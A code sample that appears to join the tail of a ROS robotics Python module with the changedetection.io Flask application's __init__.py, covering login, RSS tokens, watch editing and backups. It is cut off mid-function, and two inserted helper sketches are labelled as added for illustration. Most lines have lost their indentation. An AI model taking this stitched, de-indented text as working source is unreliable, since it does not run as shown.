t.transform.rotation.y = q[1]
t.transform.rotation.z = q[2]
t.transform.rotation.w = q[3]
t.header.frame_id = header_frame_id
t.child_frame_id = child_frame_id
return t
def enable_debug(self):
"""
Start publishing debug information on /tf and /visualization_marker for
debugging using rviz. This will happen in a separate thread.
"""
self.__debug_thread = threading.Thread(target=self.__debug_loop)
self.__debug_thread.start()
def disable_debug(self):
"""
Stop publishing debug information
"""
self.__debug_stop_event.set()
if self.__debug_thread is not None:
self.__debug_thread.join()
def __debug_loop(self):
"""
Debug loop that will run in a separate thread.
(tfBuffer should be threadsafe)
"""
broadcaster = tf2_ros.TransformBroadcaster()
rviz_marker_pub = rospy.Publisher('/visualization_marker', Marker,
queue_size=1000)
rate = rospy.Rate(5)
while not self.__debug_stop_event.is_set() and not rospy.is_shutdown():
if self.__debug_current_ws is None:
print "Could not publish debug tf, no workspace set."
rate.sleep()
continue
try:
broadcaster.sendTransform(
self.__tf_buffer.lookup_transform(
"base_link", self.__debug_current_ws.name,
rospy.Time(0))
)
broadcaster.sendTransform(
self.__tf_buffer.lookup_transform(
self.__debug_current_ws.name, "object_base",
rospy.Time(0))
)
broadcaster.sendTransform(
self.__tf_buffer.lookup_transform(
"object_base", "tool_link_target", rospy.Time(0))
)
except tf2_ros.LookupException as e:
print "Could not publish debug tf: ", e
for i in range(4): # Iterate over the 4 markers defining the workspace
msg = Marker()
msg.header.frame_id = "base_link"
msg.id = i
msg.type = 2 # 2 corresponds to a sphere marker, which will be drawn
msg.pose.position.x = self.__debug_current_ws.points[i][0]
msg.pose.position.y = self.__debug_current_ws.points[i][1]
msg.pose.position.z = self.__debug_current_ws.points[i][2]
msg.scale.x = 0.005
msg.scale.y = 0.005
msg.scale.z = 0.005
msg.color.r = 1.0 if i == 0 or i == 3 else 0.0
msg.color.g = 1.0 if i == 1 or i == 3 else 0.0
msg.color.b = 1.0 if i == 2 or i == 3 else 0.0
msg.color.a = 1.0
rviz_marker_pub.publish(msg)
rate.sleep()
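# --- Hedged example (added for illustration; not part of the original file) ---
# set_grip() above only accepts a transform whose frames are exactly
# "object_base" -> "tool_link_target". The sketch below builds such a
# TransformStamped, reusing the TransformStamped / transformations names
# already imported at the top of this file. The grip message that wraps it
# (the `grip` argument of set_grip) is not shown; the offset values are
# assumptions chosen only for illustration.
def _example_build_grip_transform():
    t = TransformStamped()
    t.header.frame_id = "object_base"
    t.child_frame_id = "tool_link_target"
    # Place the tool 5 cm above the object base, pointing straight down (assumed values).
    t.transform.translation.z = 0.05
    q = transformations.quaternion_from_euler(0, 3.14159, 0)
    t.transform.rotation.x = q[0]
    t.transform.rotation.y = q[1]
    t.transform.rotation.z = q[2]
    t.transform.rotation.w = q[3]
    return t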
|
__init__.py
|
#!/usr/bin/python3
# @todo logging
# @todo extra options for url like , verify=False etc.
# @todo enable https://urllib3.readthedocs.io/en/latest/user-guide.html#ssl as option?
# @todo option for interval day/6 hour/etc
# @todo on change detected, config for calling some API
# @todo fetch title into json
# https://distill.io/features
# proxy per check
# - flask_cors, itsdangerous,MarkupSafe
import datetime
import os
import queue
import threading
import time
from copy import deepcopy
from threading import Event
import flask_login
import pytz
import timeago
from feedgen.feed import FeedGenerator
from flask import (
Flask,
abort,
flash,
make_response,
redirect,
render_template,
request,
send_from_directory,
url_for,
)
from flask_login import login_required
from flask_wtf import CSRFProtect
from changedetectionio import html_tools
__version__ = '0.39.11'
datastore = None
# Local
running_update_threads = []
ticker_thread = None
extra_stylesheets = []
update_q = queue.Queue()
notification_q = queue.Queue()
app = Flask(__name__,
static_url_path="",
static_folder="static",
template_folder="templates")
# Stop browser caching of assets
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
app.config.exit = Event()
app.config['NEW_VERSION_AVAILABLE'] = False
app.config['LOGIN_DISABLED'] = False
#app.config["EXPLAIN_TEMPLATE_LOADING"] = True
# Disables caching of the templates
app.config['TEMPLATES_AUTO_RELOAD'] = True
csrf = CSRFProtect()
csrf.init_app(app)
notification_debug_log=[]
def init_app_secret(datastore_path):
secret = ""
path = "{}/secret.txt".format(datastore_path)
try:
with open(path, "r") as f:
secret = f.read()
except FileNotFoundError:
import secrets
with open(path, "w") as f:
secret = secrets.token_hex(32)
f.write(secret)
return secret
# Remember python is by reference
# populate_form in wtforms didn't work for me. (try using a setattr() obj type on datastore.watch?)
def populate_form_from_watch(form, watch):
for i in form.__dict__.keys():
if i[0] != '_':
p = getattr(form, i)
if hasattr(p, 'data') and i in watch:
setattr(p, "data", watch[i])
# We use the whole watch object from the store/JSON so we can see if there's some related status in terms of a thread
# running or something similar.
@app.template_filter('format_last_checked_time')
def _jinja2_filter_datetime(watch_obj, format="%Y-%m-%d %H:%M:%S"):
# Worker thread tells us which UUID it is currently processing.
for t in running_update_threads:
if t.current_uuid == watch_obj['uuid']:
return "Checking now.."
if watch_obj['last_checked'] == 0:
return 'Not yet'
return timeago.format(int(watch_obj['last_checked']), time.time())
# @app.context_processor
# def timeago():
# def _timeago(lower_time, now):
# return timeago.format(lower_time, now)
# return dict(timeago=_timeago)
@app.template_filter('format_timestamp_timeago')
def _jinja2_filter_datetimestamp(timestamp, format="%Y-%m-%d %H:%M:%S"):
return timeago.format(timestamp, time.time())
# return timeago.format(timestamp, time.time())
# return datetime.datetime.utcfromtimestamp(timestamp).strftime(format)
# When nobody is logged in Flask-Login's current_user is set to an AnonymousUser object.
class User(flask_login.UserMixin):
id=None
def set_password(self, password):
return True
def get_user(self, email="defaultuser@changedetection.io"):
return self
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return str(self.id)
# Compare given password against JSON store or Env var
def check_password(self, password):
import base64
import hashlib
# Can be stored in env (for deployments) or in the general configs
raw_salt_pass = os.getenv("SALTED_PASS", False)
if not raw_salt_pass:
raw_salt_pass = datastore.data['settings']['application']['password']
raw_salt_pass = base64.b64decode(raw_salt_pass)
salt_from_storage = raw_salt_pass[:32] # 32 is the length of the salt
# Use the exact same setup you used to generate the key, but this time put in the password to check
new_key = hashlib.pbkdf2_hmac(
'sha256',
password.encode('utf-8'), # Convert the password to bytes
salt_from_storage,
100000
)
new_key = salt_from_storage + new_key
return new_key == raw_salt_pass
pass
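# --- Hedged sketch (added for illustration; not part of the original file) ---
# The inverse of User.check_password() above: one way the stored, base64-encoded
# password blob *could* be produced so that it verifies correctly. It mirrors the
# parameters used in check_password(): a 32-byte salt, PBKDF2-HMAC-SHA256 with
# 100000 iterations, stored as base64(salt + derived_key). The function name is
# hypothetical and not part of this codebase.
def _example_hash_password(password):
    import base64
    import hashlib
    import secrets
    salt = secrets.token_bytes(32)
    key = hashlib.pbkdf2_hmac('sha256', password.encode('utf-8'), salt, 100000)
    return base64.b64encode(salt + key).decode('ascii')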
def changedetection_app(config=None, datastore_o=None):
global datastore
datastore = datastore_o
#app.config.update(config or {})
login_manager = flask_login.LoginManager(app)
login_manager.login_view = 'login'
app.secret_key = init_app_secret(config['datastore_path'])
# Setup cors headers to allow all domains
# https://flask-cors.readthedocs.io/en/latest/
# CORS(app)
@login_manager.user_loader
def user_loader(email):
user = User()
user.get_user(email)
return user
@login_manager.unauthorized_handler
def unauthorized_handler():
# @todo validate its a URL of this host and use that
return redirect(url_for('login', next=url_for('index')))
@app.route('/logout')
def logout():
flask_login.logout_user()
return redirect(url_for('index'))
# https://github.com/pallets/flask/blob/93dd1709d05a1cf0e886df6223377bdab3b077fb/examples/tutorial/flaskr/__init__.py#L39
# You can divide up the stuff like this
@app.route('/login', methods=['GET', 'POST'])
def login():
if not datastore.data['settings']['application']['password'] and not os.getenv("SALTED_PASS", False):
flash("Login not required, no password enabled.", "notice")
return redirect(url_for('index'))
if request.method == 'GET':
if flask_login.current_user.is_authenticated:
flash("Already logged in")
return redirect(url_for("index"))
output = render_template("login.html")
return output
user = User()
user.id = "defaultuser@changedetection.io"
password = request.form.get('password')
if (user.check_password(password)):
flask_login.login_user(user, remember=True)
# For now there's nothing else interesting here other than the index/list page
# It's more reliable and safe to ignore the 'next' redirect
# When we used...
# next = request.args.get('next')
# return redirect(next or url_for('index'))
# We would sometimes get login loop errors on sites hosted in sub-paths
# note for the future:
# if not is_safe_url(next):
# return flask.abort(400)
return redirect(url_for('index'))
else:
flash('Incorrect password', 'error')
return redirect(url_for('login'))
@app.before_request
def do_something_whenever_a_request_comes_in():
# Disable password login if there is not one set
# (No password in settings or env var)
app.config['LOGIN_DISABLED'] = datastore.data['settings']['application']['password'] == False and os.getenv("SALTED_PASS", False) == False
# Set the auth cookie path if we're running as X-settings/X-Forwarded-Prefix
if os.getenv('USE_X_SETTINGS') and 'X-Forwarded-Prefix' in request.headers:
app.config['REMEMBER_COOKIE_PATH'] = request.headers['X-Forwarded-Prefix']
app.config['SESSION_COOKIE_PATH'] = request.headers['X-Forwarded-Prefix']
# For the RSS path, allow access via a token
if request.path == '/rss' and request.args.get('token'):
app_rss_token = datastore.data['settings']['application']['rss_access_token']
rss_url_token = request.args.get('token')
if app_rss_token == rss_url_token:
app.config['LOGIN_DISABLED'] = True
@app.route("/rss", methods=['GET'])
@login_required
def rss():
limit_tag = request.args.get('tag')
# Sort by last_changed and add the uuid which is usually the key..
sorted_watches = []
# @todo needs a .itemsWithTag() or something
for uuid, watch in datastore.data['watching'].items():
if limit_tag != None:
# Support for comma separated list of tags.
for tag_in_watch in watch['tag'].split(','):
tag_in_watch = tag_in_watch.strip()
if tag_in_watch == limit_tag:
watch['uuid'] = uuid
sorted_watches.append(watch)
else:
watch['uuid'] = uuid
sorted_watches.append(watch)
sorted_watches.sort(key=lambda x: x['last_changed'], reverse=True)
fg = FeedGenerator()
fg.title('changedetection.io')
fg.description('Feed description')
fg.link(href='https://changedetection.io')
for watch in sorted_watches:
if not watch['viewed']:
# Re #239 - GUID needs to be individual for each event
# @todo In the future make this a configurable link back (see work on BASE_URL https://github.com/dgtlmoon/changedetection.io/pull/228)
guid = "{}/{}".format(watch['uuid'], watch['last_changed'])
fe = fg.add_entry()
# Include a link to the diff page, they will have to login here to see if password protection is enabled.
# Description is the page you watch, link takes you to the diff JS UI page
base_url = datastore.data['settings']['application']['base_url']
if base_url == '':
base_url = "<base-url-env-var-not-set>"
diff_link = {'href': "{}{}".format(base_url, url_for('diff_history_page', uuid=watch['uuid']))}
# @todo use title if it exists
fe.link(link=diff_link)
fe.title(title=watch['url'])
# @todo in the future <description><![CDATA[<html><body>Any code html is valid.</body></html>]]></description>
fe.description(description=watch['url'])
fe.guid(guid, permalink=False)
dt = datetime.datetime.fromtimestamp(int(watch['newest_history_key']))
dt = dt.replace(tzinfo=pytz.UTC)
fe.pubDate(dt)
response = make_response(fg.rss_str())
response.headers.set('Content-Type', 'application/rss+xml')
return response
@app.route("/", methods=['GET'])
@login_required
def index():
limit_tag = request.args.get('tag')
pause_uuid = request.args.get('pause')
# Redirect for the old rss path which used the /?rss=true
if request.args.get('rss'):
return redirect(url_for('rss', tag=limit_tag))
if pause_uuid:
try:
datastore.data['watching'][pause_uuid]['paused'] ^= True
datastore.needs_write = True
return redirect(url_for('index', tag = limit_tag))
except KeyError:
pass
# Sort by last_changed and add the uuid which is usually the key..
sorted_watches = []
for uuid, watch in datastore.data['watching'].items():
if limit_tag != None:
# Support for comma separated list of tags.
for tag_in_watch in watch['tag'].split(','):
tag_in_watch = tag_in_watch.strip()
if tag_in_watch == limit_tag:
watch['uuid'] = uuid
sorted_watches.append(watch)
else:
watch['uuid'] = uuid
sorted_watches.append(watch)
sorted_watches.sort(key=lambda x: x['last_changed'], reverse=True)
existing_tags = datastore.get_all_tags()
from changedetectionio import forms
form = forms.quickWatchForm(request.form)
output = render_template("watch-overview.html",
form=form,
watches=sorted_watches,
tags=existing_tags,
active_tag=limit_tag,
app_rss_token=datastore.data['settings']['application']['rss_access_token'],
has_unviewed=datastore.data['has_unviewed'],
# Don't link to hosting when we're on the hosting environment
hosted_sticky=os.getenv("SALTED_PASS", False) == False,
guid=datastore.data['app_guid'])
return output
@app.route("/scrub", methods=['GET', 'POST'])
@login_required
def scrub_page():
import re
if request.method == 'POST':
confirmtext = request.form.get('confirmtext')
limit_date = request.form.get('limit_date')
limit_timestamp = 0
# Re #149 - allow empty/0 timestamp limit
if len(limit_date):
try:
limit_date = limit_date.replace('T', ' ')
# I noticed chrome will show '/' but actually submit '-'
limit_date = limit_date.replace('-', '/')
# In the case that :ss seconds are supplied
limit_date = re.sub(r'(\d\d:\d\d)(:\d\d)', '\\1', limit_date)
str_to_dt = datetime.datetime.strptime(limit_date, '%Y/%m/%d %H:%M')
limit_timestamp = int(str_to_dt.timestamp())
if limit_timestamp > time.time():
flash("Timestamp is in the future, cannot continue.", 'error')
return redirect(url_for('scrub_page'))
except ValueError:
flash('Incorrect date format, cannot continue.', 'error')
return redirect(url_for('scrub_page'))
if confirmtext == 'scrub':
changes_removed = 0
for uuid, watch in datastore.data['watching'].items():
if limit_timestamp:
changes_removed += datastore.scrub_watch(uuid, limit_timestamp=limit_timestamp)
else:
changes_removed += datastore.scrub_watch(uuid)
flash("Cleared snapshot history ({} snapshots removed)".format(changes_removed))
else:
flash('Incorrect confirmation text.', 'error')
return redirect(url_for('index'))
output = render_template("scrub.html")
return output
# If they edited an existing watch, we need to know to reset the current/previous md5 to include
# the excluded text.
def get_current_checksum_include_ignore_text(uuid):
import hashlib
from changedetectionio import fetch_site_status
# Get the most recent one
newest_history_key = datastore.get_val(uuid, 'newest_history_key')
# 0 means there's only one entry, so there should be no 'unviewed' history available
if newest_history_key == 0:
newest_history_key = list(datastore.data['watching'][uuid]['history'].keys())[0]
if newest_history_key:
with open(datastore.data['watching'][uuid]['history'][newest_history_key],
encoding='utf-8') as file:
raw_content = file.read()
handler = fetch_site_status.perform_site_check(datastore=datastore)
stripped_content = html_tools.strip_ignore_text(raw_content,
datastore.data['watching'][uuid]['ignore_text'])
if datastore.data['settings']['application'].get('ignore_whitespace', False):
checksum = hashlib.md5(stripped_content.translate(None, b'\r\n\t ')).hexdigest()
else:
checksum = hashlib.md5(stripped_content).hexdigest()
return checksum
return datastore.data['watching'][uuid]['previous_md5']
@app.route("/edit/<string:uuid>", methods=['GET', 'POST'])
@login_required
def edit_page(uuid):
from changedetectionio import forms
form = forms.watchForm(request.form)
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
if request.method == 'GET':
if not uuid in datastore.data['watching']:
flash("No watch with the UUID %s found." % (uuid), "error")
return redirect(url_for('index'))
populate_form_from_watch(form, datastore.data['watching'][uuid])
if datastore.data['watching'][uuid]['fetch_backend'] is None:
form.fetch_backend.data = datastore.data['settings']['application']['fetch_backend']
if request.method == 'POST' and form.validate():
# Re #110, if they submit the same as the default value, set it to None, so we continue to follow the default
if form.minutes_between_check.data == datastore.data['settings']['requests']['minutes_between_check']:
form.minutes_between_check.data = None
if form.fetch_backend.data == datastore.data['settings']['application']['fetch_backend']:
form.fetch_backend.data = None
update_obj = {'url': form.url.data.strip(),
'minutes_between_check': form.minutes_between_check.data,
'tag': form.tag.data.strip(),
'title': form.title.data.strip(),
'headers': form.headers.data,
'body': form.body.data,
'method': form.method.data,
'ignore_status_codes': form.ignore_status_codes.data,
'fetch_backend': form.fetch_backend.data,
'trigger_text': form.trigger_text.data,
'notification_title': form.notification_title.data,
'notification_body': form.notification_body.data,
'notification_format': form.notification_format.data,
'extract_title_as_title': form.extract_title_as_title.data,
}
# Notification URLs
datastore.data['watching'][uuid]['notification_urls'] = form.notification_urls.data
# Ignore text
form_ignore_text = form.ignore_text.data
datastore.data['watching'][uuid]['ignore_text'] = form_ignore_text
# Reset the previous_md5 so we process a new snapshot including stripping ignore text.
if form_ignore_text:
if len(datastore.data['watching'][uuid]['history']):
update_obj['previous_md5'] = get_current_checksum_include_ignore_text(uuid=uuid)
datastore.data['watching'][uuid]['css_filter'] = form.css_filter.data.strip()
datastore.data['watching'][uuid]['subtractive_selectors'] = form.subtractive_selectors.data
# Reset the previous_md5 so we process a new snapshot including stripping ignore text.
if form.css_filter.data.strip() != datastore.data['watching'][uuid]['css_filter']:
if len(datastore.data['watching'][uuid]['history']):
update_obj['previous_md5'] = get_current_checksum_include_ignore_text(uuid=uuid)
datastore.data['watching'][uuid].update(update_obj)
flash("Updated watch.")
# Re #286 - We wait for syncing new data to disk in another thread every 60 seconds
# But in the case something is added we should save straight away
datastore.sync_to_json()
# Queue the watch for immediate recheck
update_q.put(uuid)
if form.trigger_check.data:
if len(form.notification_urls.data):
n_object = {'watch_url': form.url.data.strip(),
'notification_urls': form.notification_urls.data,
'notification_title': form.notification_title.data,
'notification_body': form.notification_body.data,
'notification_format': form.notification_format.data,
'uuid': uuid
}
notification_q.put(n_object)
flash('Test notification queued.')
else:
flash('No notification URLs set, cannot send test.', 'error')
# Diff page [edit] link should go back to diff page
if request.args.get("next") and request.args.get("next") == 'diff' and not form.save_and_preview_button.data:
return redirect(url_for('diff_history_page', uuid=uuid))
else:
if form.save_and_preview_button.data:
flash('You may need to reload this page to see the new content.')
return redirect(url_for('preview_page', uuid=uuid))
else:
return redirect(url_for('index'))
else:
if request.method == 'POST' and not form.validate():
flash("An error occurred, please see below.", "error")
# Re #110 offer the default minutes
using_default_minutes = False
if form.minutes_between_check.data == None:
form.minutes_between_check.data = datastore.data['settings']['requests']['minutes_between_check']
using_default_minutes = True
output = render_template("edit.html",
uuid=uuid,
watch=datastore.data['watching'][uuid],
form=form,
using_default_minutes=using_default_minutes,
current_base_url = datastore.data['settings']['application']['base_url']
)
return output
@app.route("/settings", methods=['GET', "POST"])
@login_required
def settings_page():
from changedetectionio import content_fetcher, forms
form = forms.globalSettingsForm(request.form)
if request.method == 'GET':
form.minutes_between_check.data = int(datastore.data['settings']['requests']['minutes_between_check'])
form.notification_urls.data = datastore.data['settings']['application']['notification_urls']
form.global_subtractive_selectors.data = datastore.data['settings']['application']['global_subtractive_selectors']
form.global_ignore_text.data = datastore.data['settings']['application']['global_ignore_text']
form.ignore_whitespace.data = datastore.data['settings']['application']['ignore_whitespace']
form.extract_title_as_title.data = datastore.data['settings']['application']['extract_title_as_title']
form.fetch_backend.data = datastore.data['settings']['application']['fetch_backend']
form.notification_title.data = datastore.data['settings']['application']['notification_title']
form.notification_body.data = datastore.data['settings']['application']['notification_body']
form.notification_format.data = datastore.data['settings']['application']['notification_format']
form.base_url.data = datastore.data['settings']['application']['base_url']
if request.method == 'POST' and form.data.get('removepassword_button') == True:
# Password unset is a GET, but we can lock the session to a salted env password to always need the password
if not os.getenv("SALTED_PASS", False):
datastore.data['settings']['application']['password'] = False
flash("Password protection removed.", 'notice')
flask_login.logout_user()
return redirect(url_for('settings_page'))
if request.method == 'POST' and form.validate():
datastore.data['settings']['application']['notification_urls'] = form.notification_urls.data
datastore.data['settings']['requests']['minutes_between_check'] = form.minutes_between_check.data
datastore.data['settings']['application']['extract_title_as_title'] = form.extract_title_as_title.data
datastore.data['settings']['application']['fetch_backend'] = form.fetch_backend.data
datastore.data['settings']['application']['notification_title'] = form.notification_title.data
datastore.data['settings']['application']['notification_body'] = form.notification_body.data
datastore.data['settings']['application']['notification_format'] = form.notification_format.data
datastore.data['settings']['application']['notification_urls'] = form.notification_urls.data
datastore.data['settings']['application']['base_url'] = form.base_url.data
datastore.data['settings']['application']['global_subtractive_selectors'] = form.global_subtractive_selectors.data
datastore.data['settings']['application']['global_ignore_text'] = form.global_ignore_text.data
datastore.data['settings']['application']['ignore_whitespace'] = form.ignore_whitespace.data
if form.trigger_check.data:
if len(form.notification_urls.data):
n_object = {'watch_url': "Test from changedetection.io!",
'notification_urls': form.notification_urls.data,
'notification_title': form.notification_title.data,
'notification_body': form.notification_body.data,
'notification_format': form.notification_format.data,
}
notification_q.put(n_object)
flash('Test notification queued.')
else:
flash('No notification URLs set, cannot send test.', 'error')
if not os.getenv("SALTED_PASS", False) and form.password.encrypted_password:
datastore.data['settings']['application']['password'] = form.password.encrypted_password
flash("Password protection enabled.", 'notice')
flask_login.logout_user()
return redirect(url_for('index'))
datastore.needs_write = True
flash("Settings updated.")
if request.method == 'POST' and not form.validate():
flash("An error occurred, please see below.", "error")
output = render_template("settings.html",
form=form,
current_base_url = datastore.data['settings']['application']['base_url'],
hide_remove_pass=os.getenv("SALTED_PASS", False))
return output
@app.route("/import", methods=['GET', "POST"])
@login_required
def import_page():
import validators
remaining_urls = []
good = 0
if request.method == 'POST':
urls = request.values.get('urls').split("\n")
for url in urls:
url = url.strip()
url, *tags = url.split(" ")
# Flask wtform validators won't work with basic auth, use validators package
if len(url) and validators.url(url):
new_uuid = datastore.add_watch(url=url.strip(), tag=" ".join(tags))
# Straight into the queue.
update_q.put(new_uuid)
good += 1
else:
if len(url):
remaining_urls.append(url)
flash("{} Imported, {} Skipped.".format(good, len(remaining_urls)))
if len(remaining_urls) == 0:
# Looking good, redirect to index.
return redirect(url_for('index'))
# Could be some remaining, or we could be on GET
output = render_template("import.html",
remaining="\n".join(remaining_urls)
)
return output
# Clear all statuses, so we do not see the 'unviewed' class
@app.route("/api/mark-all-viewed", methods=['GET'])
@login_required
def mark_all_viewed():
# Save the current newest history as the most recently viewed
for watch_uuid, watch in datastore.data['watching'].items():
datastore.set_last_viewed(watch_uuid, watch['newest_history_key'])
flash("Cleared all statuses.")
return redirect(url_for('index'))
@app.route("/diff/<string:uuid>", methods=['GET'])
@login_required
def diff_history_page(uuid):
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = [url_for('static_content', group='styles', filename='diff.css')]
try:
watch = datastore.data['watching'][uuid]
except KeyError:
flash("No history found for the specified link, bad link?", "error")
return redirect(url_for('index'))
dates = list(watch['history'].keys())
# Convert to int, sort and back to str again
# @todo replace datastore getter that does this automatically
dates = [int(i) for i in dates]
dates.sort(reverse=True)
dates = [str(i) for i in dates]
if len(dates) < 2:
flash("Not enough saved change detection snapshots to produce a report.", "error")
return redirect(url_for('index'))
# Save the current newest history as the most recently viewed
datastore.set_last_viewed(uuid, dates[0])
newest_file = watch['history'][dates[0]]
try:
with open(newest_file, 'r') as f:
newest_version_file_contents = f.read()
except Exception as e:
newest_version_file_contents = "Unable to read {}.\n".format(newest_file)
previous_version = request.args.get('previous_version')
try:
previous_file = watch['history'][previous_version]
except KeyError:
# Not present, use a default value, the second one in the sorted list.
previous_file = watch['history'][dates[1]]
try:
with open(previous_file, 'r') as f:
previous_version_file_contents = f.read()
except Exception as e:
previous_version_file_contents = "Unable to read {}.\n".format(previous_file)
output = render_template("diff.html", watch_a=watch,
newest=newest_version_file_contents,
previous=previous_version_file_contents,
extra_stylesheets=extra_stylesheets,
versions=dates[1:],
uuid=uuid,
newest_version_timestamp=dates[0],
current_previous_version=str(previous_version),
current_diff_url=watch['url'],
extra_title=" - Diff - {}".format(watch['title'] if watch['title'] else watch['url']),
left_sticky=True)
return output
@app.route("/preview/<string:uuid>", methods=['GET'])
@login_required
def preview_page(uuid):
content = []
ignored_line_numbers = []
trigger_line_numbers = []
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = [url_for('static_content', group='styles', filename='diff.css')]
try:
watch = datastore.data['watching'][uuid]
except KeyError:
flash("No history found for the specified link, bad link?", "error")
return redirect(url_for('index'))
if len(watch['history']):
timestamps = sorted(watch['history'].keys(), key=lambda x: int(x))
filename = watch['history'][timestamps[-1]]
try:
with open(filename, 'r') as f:
tmp = f.readlines()
# Get what needs to be highlighted
ignore_rules = watch.get('ignore_text', []) + datastore.data['settings']['application']['global_ignore_text']
# .readlines will keep the \n, but we will parse it here again, in the future tidy this up
ignored_line_numbers = html_tools.strip_ignore_text(content="".join(tmp),
wordlist=ignore_rules,
mode='line numbers'
)
trigger_line_numbers = html_tools.strip_ignore_text(content="".join(tmp),
wordlist=watch['trigger_text'],
mode='line numbers'
)
# Prepare the classes and lines used in the template
i=0
for l in tmp:
classes=[]
i+=1
if i in ignored_line_numbers:
classes.append('ignored')
if i in trigger_line_numbers:
classes.append('triggered')
content.append({'line': l, 'classes': ' '.join(classes)})
except Exception as e:
content.append({'line': "File doesnt exist or unable to read file {}".format(filename), 'classes': ''})
else:
content.append({'line': "No history found", 'classes': ''})
output = render_template("preview.html",
content=content,
extra_stylesheets=extra_stylesheets,
ignored_line_numbers=ignored_line_numbers,
triggered_line_numbers=trigger_line_numbers,
current_diff_url=watch['url'],
watch=watch,
uuid=uuid)
return output
@app.route("/settings/notification-logs", methods=['GET'])
@login_required
def notification_logs():
global notification_debug_log
output = render_template("notification-log.html",
logs=notification_debug_log if len(notification_debug_log) else ["No errors or warnings detected"])
return output
@app.route("/api/<string:uuid>/snapshot/current", methods=['GET'])
@login_required
def api_snapshot(uuid):
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
try:
watch = datastore.data['watching'][uuid]
except KeyError:
return abort(400, "No history found for the specified link, bad link?")
newest = list(watch['history'].keys())[-1]
with open(watch['history'][newest], 'r') as f:
content = f.read()
resp = make_response(content)
resp.headers['Content-Type'] = 'text/plain'
return resp
@app.route("/favicon.ico", methods=['GET'])
def favicon():
return send_from_directory("static/images", path="favicon.ico")
# We're good but backups are even better!
@app.route("/backup", methods=['GET'])
@login_required
def get_backup():
import zipfile
from pathlib import Path
# Remove any existing backup file, for now we just keep one file
for previous_backup_filename in Path(datastore_o.datastore_path).rglob('changedetection-backup-*.zip'):
os.unlink(previous_backup_filename)
# create a ZipFile object
backupname = "changedetection-backup-{}.zip".format(int(time.time()))
# We only care about UUIDS from the current index file
uuids = list(datastore.data['watching'].keys())
backup_filepath = os.path.join(datastore_o.datastore_path, backupname)
with zipfile.ZipFile(backup_filepath, "w",
compression=zipfile.ZIP_DEFLATED,
compresslevel=8) as zipObj:
# Be sure we're written fresh
datastore.sync_to_json()
# Add the index
zipObj.write(os.path.join(datastore_o.datastore_path, "url-watches.json"), arcname="url-watches.json")
# Add the flask app secret
zipObj.write(os.path.join(datastore_o.datastore_path, "secret.txt"), arcname="secret.txt")
# Add any snapshot data we find, use the full path to access the file, but make the file 'relative' in the Zip.
for txt_file_path in Path(datastore_o.datastore_path).rglob('*.txt'):
parent_p = txt_file_path.parent
if parent_p.name in uuids:
zipObj.write(txt_file_path,
arcname=str(txt_file_path).replace(datastore_o.datastore_path, ''),
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8)
# Create a list file with just the URLs, so it's easier to port somewhere else in the future
list_file = "url-list.txt"
with open(os.path.join(datastore_o.datastore_path, list_file), "w") as f:
for uuid in datastore.data["watching"]:
url = datastore.data["watching"][uuid]["url"]
f.write("{}\r\n".format(url))
list_with_tags_file = "url-list-with-tags.txt"
with open(
os.path.join(datastore_o.datastore_path, list_with_tags_file), "w"
) as f:
for uuid in datastore.data["watching"]:
url = datastore.data["watching"][uuid]["url"]
tag = datastore.data["watching"][uuid]["tag"]
f.write("{} {}\r\n".format(url, tag))
# Add it to the Zip
zipObj.write(
os.path.join(datastore_o.datastore_path, list_file),
arcname=list_file,
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8,
)
zipObj.write(
os.path.join(datastore_o.datastore_path, list_with_tags_file),
arcname=list_with_tags_file,
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8,
)
# Send_from_directory needs to be the full absolute path
return send_from_directory(os.path.abspath(datastore_o.datastore_path), backupname, as_attachment=True)
@app.route("/static/<string:group>/<string:filename>", methods=['GET'])
def static_content(group, filename):
# These files should be in our subdirectory
try:
return send_from_directory("static/{}".format(group), path=filename)
except FileNotFoundError:
abort(404)
@app.route("/api/add", methods=['POST'])
@login_required
def api_watch_add():
from changedetectionio import forms
form = forms.quickWatchForm(request.form)
if form.validate():
url = request.form.get('url').strip()
if datastore.url_exists(url):
flash('The URL {} already exists'.format(url), "error")
return redirect(url_for('index'))
# @todo add_watch should throw a custom Exception for validation etc
new_uuid = datastore.add_watch(url=url, tag=request.form.get('tag').strip())
# Straight into the queue.
update_q.put(new_uuid)
flash("Watch added.")
return redirect(url_for('index'))
else:
flash("Error")
return redirect(url_for('index'))
@app.route("/api/delete", methods=['GET'])
@login_required
def api_delete():
uuid = request.args.get('uuid')
datastore.delete(uuid)
flash('Deleted.')
return redirect(url_for('index'))
@app.route("/api/clone", methods=['GET'])
@login_required
def api_clone():
uuid = request.args.get('uuid')
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
new_uuid = datastore.clone(uuid)
update_q.put(new_uuid)
flash('Cloned.')
return redirect(url_for('index'))
@app.route("/api/checknow", methods=['GET'])
@login_required
def api_watch_checknow():
tag = request.args.get('tag')
uuid = request.args.get('uuid')
i = 0
running_uuids = []
for t in running_update_threads:
running_uuids.append(t.current_uuid)
# @todo check thread is running and skip
if uuid:
if uuid not in running_uuids:
update_q.put(uuid)
i = 1
elif tag != None:
# Items that have this current tag
for watch_uuid, watch in datastore.data['watching'].items():
if (tag != None and tag in watch['tag']):
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
else:
# No tag, no uuid, add everything.
for watch_uuid, watch in datastore.data['watching'].items():
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
flash("{} watches are queued for rechecking.".format(i))
return redirect(url_for('index', tag=tag))
# @todo handle ctrl break
ticker_thread = threading.Thread(target=ticker_thread_check_time_launch_checks).start()
threading.Thread(target=notification_runner).start()
# Check for new release version, but not when running in test/build
if not os.getenv("GITHUB_REF", False):
threading.Thread(target=check_for_new_version).start()
return app
# Check for new version and anonymous stats
def check_for_new_version():
import requests
import urllib3
